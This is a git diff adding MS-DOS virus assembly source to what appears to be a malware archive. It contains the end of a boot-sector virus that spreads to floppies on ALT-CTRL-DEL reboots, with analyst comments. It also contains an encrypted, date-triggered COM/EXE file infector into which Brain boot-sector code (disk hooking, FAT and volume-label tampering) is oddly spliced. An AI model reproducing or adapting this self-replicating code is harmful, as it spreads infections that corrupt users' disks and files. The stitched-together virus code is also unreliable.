+; it will move itself to upper memory. It redirects the keyboard ;
+; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
+; it will attempt to infect any floppy it finds in drive A:. ;
+; It keeps the real boot sector at track 39, sector 8, head 0 ;
+; It does not map this sector bad in the fat (unlike the Pakistani Brain)
+; and should that area be used by a file, the virus ;
+; will die. It also contains no anti detection mechanisms as does the ;
+; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
+; sector 9 because this is common to all floppy formats both single ;
+; sided and double sided. It does not contain any malevolent TROJAN ;
+; HORSE code. It does appear to contain a count of how many times it ;
+; has infected other diskettes although this is harmless and the count ;
+; is never accessed. ;
+; ;
+; Things to note about this virus: ;
+; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
+; is its primary (only for that matter) means of reproduction to other ;
+; floppy diskettes. The only way to remove it from an infected system ;
+; is to turn the machine off and reboot an uninfected copy of DOS. ;
+; It is even resident when no floppy is booted but BASIC is loaded ;
+; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
+; it activates and infectes the floppy from which the user is ;
+; attempting to boot. ;
+; ;
+; Also note that because of the POP CS command to pass control to ;
+; its self in upper memory, this virus does not to work on 80286 ;
+; machines (because this is not a valid 80286 instruction). 
; 
+; ;
+; The Norton Utilities can be used to identify infected diskettes by ;
+; looking at the boot sector and the DOS SYS utility can be used to ;
+; remove it (unlike the Pakistani Brain). ;
+;-----------------------------------------------------------------------;
+ ;
+ ORG 7C00H ;
+ ;
+TOS LABEL WORD ;TOP OF STACK
+;-----------------------------------------------------------------------;
+; 1. Find top of memory and copy ourself up there. (keeping same offset);
+; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
+; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
+; 4. Jump to ourself at top of memory ;
+; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
+;-----------------------------------------------------------------------;
+BEGIN: CLI ;INITIALIZE STACK
+ XOR AX,AX ;
+ MOV SS,AX ;
+ MOV SP,offset TOS ;
+ STI ;
+ ;
+ MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
+ MOV DS,BX ;
+ MOV AX,[0013H] ;
+ MUL BX ;
+ SUB AX,07E0H ; (7C00H+512)/16
+ MOV ES,AX ;
+ ;
+ PUSH CS ;DS = CS
+ POP DS ;
+ ;
+ CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
+ JNE B_10 ;
+ DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
+ ;
+B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
+ MOV DI,SI ;
+ MOV CX,512 ;
+ CLD ;
+ REP MOVSB ;
+ ;
+ MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
+ MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
+ MOV CX,128 ;
+ REP MOVSB ;
+ ;
+ CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ ;
+ PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
+ NOP
+ ;
+ PUSH DS ;DS=0 ; ES = DS
+ POP ES ;
+ ;
+ MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
+ MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
+ MOV CX,2708H ; TRACK 40, SECTOR 8
+ MOV AX,0201H ; READ SECTOR
+ INT 13H ; (common to 8/9 sect. 1/2 sided!) 
+ JB $ ; HANG IF ERROR
+ ;
+ JMP JMP_BOOT ;JMP 0000:7C00
+ ;
+;-----------------------------------------------------------------------;
+; SAVE THEN REDIRECT INT 9 VECTOR ;
+; ;
+; ON ENTRY: DS = 0 ;
+; ES = WHERE TO SAVE OLD_09 & (HI) ;
+; WHERE NEW_09 IS (HI) ;
+;-----------------------------------------------------------------------;
+PUT_NEW_09: ;
+ DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
+ ;
+ MOV SI,9*4 ;COPY INT 9 VECTOR TO
+ MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
+ MOV CX,0004 ;
+ ;
+ CLI ;
+ REP MOVSB ;
+ MOV Word Ptr [9*4],offset NEW_09
+ MOV [(9*4)+2],ES ;
+ STI ;
+ ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
+;-----------------------------------------------------------------------;
+ACK_KEYBD: ;
+ IN AL,61H ;RESET KEYBOARD THEN CONTINUE
+ MOV AH,AL ;
+ OR AL,80H ;
+ OUT 61H,AL ;
+ XCHG AL,AH ;
+ OUT 61H,AL ;
+ JMP RBOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
+; REASON UNKNOWN ;
+;-----------------------------------------------------------------------;
+TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
+ DB 27H,0,2,2 ; (CURRENTLY NOT USED)
+ DB 27H,0,3,2 ;
+ DB 27H,0,4,2 ;
+ DB 27H,0,5,2 ;
+ DB 27H,0,6,2 ;
+ DB 27H,0,7,2 ;
+ DB 27H,0,8,2 ;
+ ;
+;A7C9A LABEL BYTE ;
+ DW 00024H ;NOT USED
+ DB 0ADH ;
+ DB 07CH ;
+ DB 0A3H ;
+ DW 00026H ;
+ ;
+;L7CA1: ;
+ POP CX ;NOT USED
+ POP DI ;
+ POP SI ;
+ POP ES ;
+ POP DS ;
+ POP AX ;
+ POPF ;
+ JMP 1111:1111 ;
+ ;
+;-----------------------------------------------------------------------;
+; IF ALT & CTRL & DEL THEN ... ;
+; IF ALT & CTRL & ? THEN ... 
; 
+;-----------------------------------------------------------------------;
+NEW_09: PUSHF ;
+ STI ;
+ ;
+ PUSH AX ;
+ PUSH BX ;
+ PUSH DS ;
+ ;
+ PUSH CS ;DS=CS
+ POP DS ;
+ ;
+ MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
+ IN AL,60H ;GET SCAN CODE
+ MOV AH,AL ;SAVE IN AH
+ AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
+ ;
+ CMP AL,1DH ;IS IT A [CTRL]...
+ JNE N09_10 ;...JUMP IF NO
+ MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
+ JMP N09_30 ;
+ ;
+N09_10: CMP AL,38H ;IS IT AN [ALT]...
+ JNE N09_20 ;...JUMP IF NO
+ MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
+ JMP N09_30 ;
+ ;
+N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
+ JNE N09_30 ;...JUMP IF NO
+ ;
+ CMP AL,17H ;IF [I]...
+ JE N09_X0 ;...JUMP IF YES
+ CMP AL,53H ;IF [DEL]...
+ JE ACK_KEYBD ;...JUMP IF YES
+ ;
+N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
+ ;
+N09_90: POP DS ;
+ POP BX ;
+ POP AX ;
+ POPF ;
+ ;
+ DB 0EAH ;JMP F000:E987
+OLD_09 DW ? ;
+ DW 0F000H ;
+ ;
+N09_X0: JMP N09_X1 ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
+ MOV AX,0800H ;AL=0, AH=DELAY ARG
+ OUT DX,AL ;
+ CALL DELAY ;
+ MOV [ALT_CTRL],AX ;AX=0 ;
+ ;
+ MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
+ INT 10H ;
+ MOV AH,2 ;SET CURSOR POS 0,0
+ XOR DX,DX ;
+ MOV BH,DH ; PAGE 0
+ INT 10H ;
+ ;
+ MOV AH,1 ;SET CURSOR TYPE
+ MOV CX,0607H ;
+ INT 10H ;
+ ;
+ MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
+ CALL DELAY ;
+ ;
+ CLI ;
+ OUT 20H,AL ;SEND EOI TO INT CONTROLLER
+ ;
+ MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
+ MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) 
+ MOV SI,offset BEGIN - 128 ;
+ MOV CX,128 ;
+ CLD ;
+ REP MOVSB ;
+ ;
+ MOV DS,CX ;CX=0 ;DS=0
+ ;
+ MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
+ MOV [(19H*4)+2],CS ;
+ ;
+ MOV AX,0040H ;DS = ROM DATA AREA
+ MOV DS,AX ;
+ ;
+ MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
+ INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
+ ;
+ PUSH DS ;IF BIOS F000:E502 == 21E4...
+ MOV AX,0F000H ;
+ MOV DS,AX ;
+ CMP Word Ptr [0E502H],21E4H ;
+ POP DS ;
+ JE R_90 ;
+ INT 19H ; IF NOT...REBOOT
+ ;
+R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
+ ;
+;-----------------------------------------------------------------------;
+; REBOOT INT VECTOR ;
+;-----------------------------------------------------------------------;
+NEW_19: XOR AX,AX ;
+ ;
+ MOV DS,AX ;DS=0
+ MOV AX,[0410] ;AX=EQUIP FLAG
+ TEST AL,1 ;IF FLOPPY DRIVES ...
+ JNZ N19_20 ;...JUMP
+N19_10: PUSH CS ;ELSE ES=CS
+ POP ES ;
+ CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ INT 18H ;LOAD BASIC
+ ;
+N19_20: MOV CX,0004 ;RETRY COUNT = 4
+ ;
+N19_22: PUSH CX ;
+ MOV AH,00 ;RESET DISK
+ INT 13 ;
+ JB N19_81 ;
+ MOV AX,0201 ;READ BOOT SECTOR
+ PUSH DS ;
+ POP ES ;
+ MOV BX,offset BEGIN ;
+ MOV CX,1 ;TRACK 0, SECTOR 1
+ INT 13H ;
+N19_81: POP CX ;
+ JNB N19_90 ;
+ LOOP N19_22 ;
+ JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection segment. ;
+;-----------------------------------------------------------------------;
+N19_90: CMP DI,3456 ;IF NOT FLAG SET...
+ JNZ RE_INFECT ;...RE INFECT
+ ;
+JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
+ JMP 0000:7C00H ;
+ ;
+;-----------------------------------------------------------------------;
+; Reinfection Segment. ;
+;-----------------------------------------------------------------------;
+RE_INFECT: ;
+ MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
+ MOV CX,00E6H ; OURSELF
+ MOV DI,SI ;
+ PUSH CS ;
+ POP ES ;
+ CLD ;
+ REPE CMPSB ;
+ JE RI_12 ;IF NOT EQUAL... 
+ ;
+ INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
+ ;
+;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
+ MOV BX,offset TABLE ;FORMAT INFO
+ MOV DX,0000 ;DRIVE A: HEAD 0
+ MOV CH,40-1 ;TRACK 39
+ MOV AH,5 ;FORMAT
+ JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
+ ;
+; <<< NO EXECUTION PATH TO HERE >>> ;
+ JB RI_80 ;
+ ;
+;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
+RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
+ MOV BX,offset BEGIN ;TRACK 40H
+ MOV CL,8 ;SECTOR 8
+ MOV AX,0301H ;WRITE 1 SECTOR
+ INT 13H ;
+ ;
+ PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
+ POP ES ;
+ JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
+ ;
+ MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
+ MOV AX,0301 ;
+ INT 13H ;
+ JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
+ ;
+RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
+ INT 19H ;...FLAG AND REBOOT
+ ;
+RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
+ DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
+ JMP JMP_BOOT ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
+ ;
+ MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
+ MOV BX,0040H ;
+ MOV DS,BX ;
+ MOV [0072H],AX ; 0040:0072 = RESET FLAG
+ JMP N09_90 ;
+ ;
+;-----------------------------------------------------------------------;
+; DELAY ;
+; ;
+; ON ENTRY AH:CX = LOOP COUNT ;
+;-----------------------------------------------------------------------;
+DELAY: SUB CX,CX ;
+D_01: LOOP $ ;
+ SUB AH,1 ;
+ JNZ D_01 ;
+ RET ;
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+A7DF4 DB 27H,00H,8,2
+
+COUNTER_1 DW 001CH
+ALT_CTRL DW 0
+A7DFC DB 27H,0,8,2
+
\ No newline at end of file
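Review bot: This file and MSDOS/Virus.MSDOS.Unknown.alemeda.asm are added with the same blob hash (both `index 00000000..287ade7e`), so the commit lands two byte-identical copies under two spellings of one name. For an archive that is catalogued by hash and by filename, keeping a single copy avoids the pair being counted as two variants in inventories and signature cross-references; if both names are wanted for historical reasons, a first-line comment such as `; identical copy of Virus.MSDOS.Unknown.alemeda.asm` in each would record that. The header text also places the saved boot sector at track 39 while the numbered step list says track 40; the code uses `MOV CX,2708H` (CH=27H, a zero-based track 39), so a note that the step list counts tracks from 1 would spare an analyst locating the original sector for clean-up the ambiguity.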
diff --git a/MSDOS/Virus.MSDOS.Unknown.alchemy.asm b/MSDOS/Virus.MSDOS.Unknown.alchemy.asm
new file mode 100644
index 00000000..6e6a62ed
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.alchemy.asm
@@ -0,0 +1,1039 @@
+; Alchemy.asm : [Arachnyphobia] by Abraxas
+; Created wik the Phalcon/Skism Mass-Produced Code Generator
+; from the configuration file skeleton.cfg
+
+.model tiny ; Handy directive
+.code ; Virus code segment
+ org 100h ; COM file starting IP
+
+id = 'DA' ; ID word for EXE infections
+entry_point: db 0e9h,0,0 ; jmp decrypt
+
+decrypt: ; handles encryption and decryption
+patch_startencrypt:
+ mov bx,offset startencrypt ; start of decryption
+ mov cx,(offset heap - offset startencrypt)/2 ; iterations
+decrypt_loop:
+ db 2eh,81h,07h ; add word ptr cs:[bx], xxxx
+decrypt_value dw 0 ; initialised at zero for null effect
+ inc bx ; calculate new decryption location
+ inc bx
+ loop decrypt_loop ; decrypt mo'
+startencrypt:
+ call next ; calculate delta offset
+next: pop bp ; bp = IP next
+ sub bp,offset next ; bp = delta offset
+
+ cmp sp,id ; COM or EXE?
+ je restoreEXE
+restoreCOM:
+ lea si,[bp+save3]
+ mov di,100h
+ push di ; For later return
+ movsb
+ jmp short restoreEXIT
+restoreEXE:
+ push ds
+ push es
+ push cs ; DS = CS
+ pop ds
+ push cs ; ES = CS
+ pop es
+ lea si,[bp+jmpsave2]
+ lea di,[bp+jmpsave]
+ movsw
+ movsw
+ movsw
+restoreEXIT:
+ movsw
+
+ mov byte ptr [bp+numinfec],1 ; reset infection counter
+
+ mov ah,1Ah ; Set new DTA
+ lea dx,[bp+newDTA] ; new DTA @ DS:DX
+ int 21h
+
+ mov ah,47h ; Get current directory
+ mov dl,0 ; Current drive
+ lea si,[bp+origdir] ; DS:SI->buffer
+ int 21h
+ mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
+
+ mov ax,3524h ; Get int 24 handler
+ int 21h ; to ES:BX
+ mov word ptr [bp+oldint24],bx; Save it
+ mov word ptr [bp+oldint24+2],es
+ mov ah,25h ; Set new int 24 handler
+ lea dx,[bp+offset int24] ; DS:DX->new handler
+ int 21h
+ push cs ; Restore ES
+ pop es ; 'cuz it was changed
+
+dir_scan: ; "dot dot" traversal
+ lea dx,[bp+exe_mask]
+ call infect_mask
+ lea dx,[bp+com_mask]
+ call infect_mask
+ mov ah,3bh ; change directory
+ lea dx,[bp+dot_dot] ; "cd .." 
+ int 21h
+ jnc dir_scan ; go back for mo!
+
+done_infections:
+ mov ah,2ah ; Get current date
+ int 21h
+ cmp dh,10 ; Check month
+ jb exit_virus
+ cmp dl,14 ; Check date
+ jb exit_virus
+ cmp cx,1991 ; Check year
+ jae activate
+
+exit_virus:
+ mov ax,2524h ; Restore int 24 handler
+ lds dx,[bp+offset oldint24] ; to original
+ int 21h
+ push cs
+ pop ds
+
+ mov ah,3bh ; change directory
+ lea dx,[bp+origdir-1] ; original directory
+ int 21h
+
+ mov ah,1ah ; restore DTA to default
+ mov dx,80h ; DTA in PSP
+ cmp sp,id-4 ; EXE or COM?
+ jz returnEXE
+returnCOM:
+ int 21h
+ retn ; 100h is on stack
+returnEXE:
+ pop es
+ pop ds
+ int 21h
+ mov ax,es ; AX = PSP segment
+ add ax,10h ; Adjust for PSP
+ add word ptr cs:[bp+jmpsave+2],ax
+ add ax,word ptr cs:[bp+stacksave+2]
+ cli ; Clear intrpts for stack manipulation
+ mov sp,word ptr cs:[bp+stacksave]
+ mov ss,ax
+ sti
+ db 0eah ; jmp ssss:oooo
+jmpsave dd ? ; Original CS:IP
+stacksave dd ? ; Original SS:SP
+jmpsave2 db ? ; Actually four bytes
+save3 db 0cdh,20h,0 ; First 3 bytes of COM file
+stacksave2 dd ?
+
+activate: ; Conditions satisfied
+ org 0
+
+ cli
+ jmp entervirus
+idbytes db 34h, 12h
+firsthead db 0
+firstsector dw 2707h
+curhead db 0
+cursector dw 1
+ db 0, 0, 0, 0
+ db 'Welcome to the Dungeon '
+copyright db '(c) 1986 Brain'
+ db 17h
+ db '& Amjads (pvt) Ltd VIRUS_SHOE '
+ db ' RECORD v9.0 Dedicated to th'
+ db 'e dynamic memories of millions o'
+ db 'f virus who are no longer with u'
+ db 's today - Thanks GOODNESS!! '
+ db ' BEWARE OF THE er..VIRUS : \th'
+ db 'is program is catching prog'
+ db 'ram follows after these messeges'
+ db '..... $'
+ db '#@%$'
+ db '@!! 
' 
+entervirus:
+ mov ax,cs
+ mov ds,ax ; ds = 0
+ mov ss,ax ; set stack to after
+ mov sp,0F000h ; virus
+ sti
+ mov al,ds:[7C00h+offset firsthead]
+ mov ds:[7C00h+offset curhead],al
+ mov cx,ds:[7C00h+offset firstsector]
+ mov ds:[7C00h+offset cursector],cx
+ call calcnext
+ mov cx,5 ; read five sectors
+ mov bx,7C00h+200h ; after end of virus
+
+loadnext:
+ call readdisk
+ call calcnext
+ add bx,200h
+ loop loadnext
+
+ mov ax,word ptr ds:[413h] ; Base memory size in Kb
+ sub ax,7 ; - 7 Kb
+ mov word ptr ds:[413h],ax ; Insert as new value
+ mov cl,6
+ shl ax,cl ; Convert to paragraphs
+ mov es,ax
+ mov si,7C00h ; Copy from virus start
+ mov di,0 ; to start of memory
+ mov cx,1004h ; Copy 1004h bytes
+ cld
+ rep movsb
+ push es
+ mov ax,200h
+ push ax
+ retf ; return to old boot sector
+
+readdisk:
+ push cx
+ push bx
+ mov cx,4 ; Try 4 times
+
+tryread:
+ push cx
+ mov dh,ds:[7C00h+offset curhead]
+ mov dl,0 ; Read sector from default
+ mov cx,ds:[7C00h+offset cursector]
+ mov ax,201h ; Disk to memory at es:bx
+ int 13h
+ jnc readOK
+ mov ah,0 ; Reset disk
+ int 13h ; (force read track 0)
+ pop cx
+ loop tryread
+
+ int 18h ; ROM basic on failure
+readOK:
+ pop cx
+ pop bx
+ pop cx
+ retn
+
+calcnext:
+ mov al,byte ptr ds:[7C00h+offset cursector]
+ inc al
+ mov byte ptr ds:[7C00h+offset cursector],al
+ cmp al,0Ah
+ jne donecalc
+ mov byte ptr ds:[7C00h+offset cursector],1
+ mov al,ds:[7C00h+offset curhead]
+ inc al
+ mov ds:[7C00h+offset curhead],al
+ cmp al,2
+ jne donecalc
+ mov byte ptr ds:[7C00h+offset curhead],0
+ inc byte ptr ds:[7C00h+offset cursector+1]
+donecalc:
+ retn
+
+; the following is a collection of garbage bytes
+ db 00h, 00h, 00h, 00h, 32h,0E3h
+ db 23h, 4Dh, 59h,0F4h,0A1h, 82h
+ db 0BCh,0C3h, 12h, 00h, 7Eh, 12h
+ db 0CDh, 21h,0A2h, 3Ch, 5Fh
+a_data dw 050Ch
+; Second part of the virus begins here
+ jmp short entersecondpart
+ db '(c) 1986 Brain & Amjads (pvt) Ltd ',0
+readcounter db 4 ; keep track of # reads
+curdrive db 0
+int13flag db 0
+
+entersecondpart:
+ mov cs:readcounter,1Fh
+ xor ax,ax
+ mov ds,ax ; ds -> interrupt table
+ mov ax,ds:[13h*4]
+ mov ds:[6Dh*4],ax
+ mov ax,ds:[13h*4+2]
+ mov ds:[6Dh*4+2],ax
+ mov ax,offset int13 ; 276h
+ mov ds:[13h*4],ax
+ mov ax,cs
+ mov ds:[13h*4+2],ax
+ mov cx,4 ; 4 tries
+ xor ax,ax
+ mov es,ax ; es -> interrupt table
+
+tryreadbootsector:
+ push cx
+ mov dh,cs:firsthead
+ mov dl,0
+ mov cx,cs:firstsector
+ mov ax,201h ; read from default disk
+ mov bx,7C00h
+ int 6Dh ; int 13h
+ jnc readbootOK
+ mov ah,0
+ int 6Dh ; int 13h
+ pop cx
+ loop tryreadbootsector
+
+ int 18h ; ROM basic on failure
+readbootOK: ; return control to
+ ; original boot sector
+;* jmp far ptr 0000:7C00h
+ db 0EAh, 00h, 7Ch, 00h, 00h
+ nop ; MASM NOP!!!
+int13:
+ sti
+ cmp ah,2 ; if not read request,
+ jne doint13 ; do not go further
+ cmp dl,2 ; if after second floppy,
+ ja doint13 ; do not go further
+ cmp ch,0 ; if not reading boot sector,
+ jne regularread ; go handle as usual
+ cmp dh,0 ; if boot sector,
+ je readboot ; do I<-/>/\|> stuff
+regularread:
+ dec cs:readcounter ; Infect after 4 reads
+ jnz doint13 ; If counter still OK, don't
+ ; do anything else
+ jmp short readboot ; Otherwise, try to infect
+doint13:
+ jmp exitint13h
+readboot:
+; FINISH THIS!
+ mov cs:int13flag,0 ; clear flag
+ mov cs:readcounter,4 ; reset counter
+ push ax
+ push bx
+ push cx
+ push dx
+ mov cs:curdrive,dl
+ mov cx,4
+
+tryreadbootblock:
+ push cx
+ mov ah,0 ; Reset disk
+ int 6Dh
+ jc errorreadingbootblock ; Try again
+ mov dh,0
+ mov cx,1
+ mov bx,offset readbuffer ; buffer @ 6BEh
+ push es
+ mov ax,cs
+ mov es,ax
+ mov ax,201h
+ int 6Dh ; Read boot sector
+ pop es
+ jnc continuestuff ; continue if no error
+errorreadingbootblock:
+ pop cx
+ loop tryreadbootblock
+
+ jmp short resetdisk ; too many failures
+ nop
+continuestuff:
+ pop cx ; get system id in boot block
+ mov ax,word ptr cs:[offset readbuffer+4]
+ cmp ax,1234h ; already infected? 
+ jne dodisk ; if not, infect it
+ mov cs:int13flag,1 ; flag prev. infection
+ jmp short noreset
+dodisk:
+ push ds
+ push es
+ mov ax,cs
+ mov ds,ax
+ mov es,ax
+ push si
+ call writevirus ; infect the disk
+ jc failme ; exit on failure
+ mov cs:int13flag,2 ; flag success
+ call changeroot ; manipulate volume label
+failme:
+ pop si
+ pop es
+ pop ds
+ jnc noreset ; don't reset on success
+resetdisk:
+ mov ah,0 ; reset disk
+ int 6Dh ; int 13h
+noreset:
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ cmp cx,1
+ jne exitint13h
+ cmp dh,0
+ jne exitint13h
+ cmp cs:int13flag,1 ; already infected?
+ jne wasntinfected ; if wasn't, go elsewhere
+ mov cx,word ptr cs:[offset readbuffer+7]
+ mov dx,word ptr cs:[offset readbuffer+5]
+ mov dl,cs:curdrive ; otherwise, read real
+ jmp short exitint13h ; boot sector
+wasntinfected:
+ cmp cs:int13flag,2 ; successful infection?
+ jne exitint13h ; if not, just do call
+ mov cx,cs:firstsector
+ mov dh,cs:firsthead
+exitint13h:
+ int 6Dh ; int 13h
+ retf 2
+ db 15 dup (0)
+
+FATManip: ; returns al as error code
+ jmp short delvedeeper
+ nop
+FATManipreadcounter dw 3
+ db ' (c) 1986 Brain & Amjads (pvt) Ltd'
+delvedeeper:
+ call readFAT ; Get FAT ID byte
+ mov ax,word ptr ds:[offset readbuffer]
+ cmp ax,0FFFDh ; is it 360K disk?
+ je is360Kdisk ; continue if so
+ mov al,3 ; al=3 == not good disk
+ stc ; flag error
+ retn ; and exit
+is360Kdisk:
+ mov cx,37h
+ mov FATManipreadcounter,0 ; none found yet
+checknextsector:
+ call FATentry12bit ; get entry in FAT
+ cmp ax,0 ; unused?
+ jne notunused
+ inc FATManipreadcounter ; one more found unused
+ cmp FATManipreadcounter,3 ; If need more,
+ jne tryanother ; go there
+ jmp short markembad ; found 3 consecutive
+ nop ; empty sectors
+notunused:
+ mov FATManipreadcounter,0 ; must start over
+tryanother:
+ inc cx ; try next sector
+ cmp cx,163h ; end of disk? 
+ jne checknextsector ; if not, continue
+ mov al,1 ; al=1 == none empty
+ stc ; Indicate error
+ retn
+markembad:
+ mov dl,3 ; 3 times
+markanotherbad:
+ call markbad12bit
+ dec cx
+ dec dl
+ jnz markanotherbad
+ inc cx
+ call calc1sttrack
+ call writeFAT ; update FAT
+ mov al,0 ; al=0 == ok
+ clc ; indicate success
+ retn
+
+markbad12bit:
+ push cx
+ push dx
+ mov si,offset readbuffer ; si -> buffer
+ mov al,cl
+ shr al,1
+ jc low_12 ; low bits
+ call clus2offset12bit
+ mov ax,[bx+si] ; get FAT entry
+ and ax,0F000h ; mark it bad
+ or ax,0FF7h
+ jmp short putitback ; and put it back
+ nop
+low_12:
+ call clus2offset12bit
+ mov ax,[bx+si] ; get FAT entry
+ and ax,0Fh ; mark it bad
+ or ax,0FF70h
+putitback:
+ mov [bx+si],ax ; replace FAT entry
+ mov word ptr ds:[400h][bx+si],ax ; in two places
+ pop dx
+ pop cx
+ retn
+
+FATentry12bit:
+ push cx
+ mov si,offset readbuffer ; si->buffer
+ mov al,cl
+ shr al,1
+; Part 3 of the virus starts here
+ jc want_high_12
+ call clus2offset12bit
+ mov ax,[bx+si]
+ and ax,0FFFh
+ jmp short exitFATentry12bit
+ nop
+want_high_12:
+ call clus2offset12bit ; xxxxxxxxxxxx0000
+ mov ax,[bx+si] ; ^^^^^^^^^^^^wanted
+ and ax,0FFF0h ; mask wanted bits
+ mov cl,4 ; and move to correct
+ shr ax,cl ; position
+exitFATentry12bit:
+ pop cx
+ retn
+
+clus2offset12bit:
+ push dx
+ mov ax,3
+ mul cx
+ shr ax,1 ; ax = cx*1.5
+ mov bx,ax
+ pop dx
+ retn
+
+readFAT:
+ mov ah,2 ; read
+ call FAT_IO
+ retn
+
+writeFAT:
+ mov ah,3 ; write
+ call FAT_IO
+ retn
+
+FAT_IO:
+ mov cx,4 ; try four times
+FAT_IOLoop:
+ push cx
+ push ax
+ mov ah,0 ; reset disk
+ int 6Dh ; int 13h
+ pop ax
+ jc tryFAT_IOagain
+ mov bx,offset readbuffer
+ mov al,4 ; 4 sectors
+ mov dh,0 ; head 0
+ mov dl,curdrive
+ mov cx,2 ; sector 2
+ push ax ; (FAT)
+ int 6Dh ; int 13h
+ pop ax
+ jnc exitFAT_IO
+tryFAT_IOagain:
+ pop cx
+ loop FAT_IOLoop
+
+ pop ax
+ pop ax
+ mov al,2
+ stc ; mark error
+ retn
+exitFAT_IO:
+ pop cx
+ retn
+
+calc1sttrack:
+ push cx
+ sub cx,2
+ shl cx,1 ; 2 
sectors/cluster
+ add cx,0Ch ; start of data area
+ mov ax,cx ; ax = sector
+ mov cl,12h ; 4096
+ div cl ; ax/4096 = al rem ah
+ mov byte ptr firstsector+1,al
+ mov firsthead,0
+ inc ah
+ cmp ah,9 ; past track 9?
+ jbe notpasttrack9 ; nope, we are ok
+ sub ah,9 ; otherwise, adjust
+ mov firsthead,1
+notpasttrack9:
+ mov byte ptr firstsector,ah
+ pop cx
+ retn
+
+ db 0, 0, 0, 0, 0, 0
+r_or_w_root db 3
+entrycount dw 35h
+
+tempsave1 dw 303h
+tempsave2 dw 0EBEh
+tempsave3 dw 1
+tempsave4 dw 100h
+ db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh
+ db 8Dh, 98h, 9Fh, 8Eh,0E0h
+ db ' (c) ashar $'
+changeroot:
+ call readroot ; read in root directory
+ jc donotchangeroot
+ push di
+ call changevolume ; change volume label
+ pop di
+ jc donotchangeroot
+ call writeroot ; write back new root dir
+donotchangeroot:
+ retn
+; The following is just garbage bytes
+ db 0BBh, 9Bh, 04h,0B9h, 0Bh
+ db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h
+ db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h
+ db 0C6h, 06h
+
+changevolume:
+ mov entrycount,6Ch
+ mov si,offset readbuffer+40h; 3nd dir entry
+ mov tempsave1,dx
+ mov ax,entrycount ; 6Ch
+ shr ax,1
+ mov tempsave3,ax ; 36h
+ shr ax,1
+ mov tempsave2,ax ; 1Bh
+ xchg ax,cx
+ and cl,43h ; cx = 3
+ mov di,tempsave2
+ add di,1E3h ; di = 01FE
+findlabel:
+ mov al,[si]
+ cmp al,0
+ je dolabel ; no mo entries
+ mov al,[si+0Bh] ; attribute byte
